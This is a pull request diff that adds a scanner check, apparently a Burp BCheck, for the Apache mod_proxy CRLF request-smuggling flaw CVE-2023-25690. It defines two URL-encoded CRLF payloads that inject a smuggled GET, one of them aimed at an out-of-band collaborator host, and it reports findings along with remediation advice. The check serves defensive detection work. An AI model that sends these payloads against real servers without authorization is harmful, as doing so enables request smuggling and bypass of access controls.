Merge pull request #58 from p80n-sec/p80n-sec-patch-1

Create Apache mod_proxy CRLF Smuggling CVE-2023-25690

vulnerabilities-CVEd/CVE-2023-25690 Apache mod_proxy CRLF Smuggling

@@ -0,0 +1,33 @@
+metadata:
+    language: v1-beta
+    name: "CVE-2023-25690"
+    description: "Tests for CRLF based HTTP Request Smuggling/Splitting according to CVE-2023-25690"
+    author: "Peyton Kennedy"
+
+define:
+    injected_payload1 =`%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED`
+    injected_payload2 =`%20HTTP/1.1%0d%0aHost:%20{generate_collaborator_address()}%0d%0a%0d%0aGET%20/SMUGGLED`
+
+given request then
+    send request called split:
+        method: "GET"
+        appending path: {injected_payload1}
+    send request called oob:
+        method: "GET"
+        appending path: {injected_payload2}
+
+    if {split.response.body} matches "\"statusCode\":200" or {latest.response.status_code} is "200" then
+        report issue:
+            severity: medium
+            confidence: tentative
+            detail: "Apache mod_proxy rules appear to be insecurely splitting requests based on URI path. For more detail, refrence CVE-2023-25690"
+            remediation: "Upgrade to latest version of Apache mod_proxy"
+                end if
+
+    if http interactions then
+        report issue:
+            severity: high
+            confidence: firm
+            detail: "External interaction is detected from an arbitrary host header due to CVE-2023-25690"
+            remediation: "Upgrade to latest version of Apache mod_proxy"
+                end if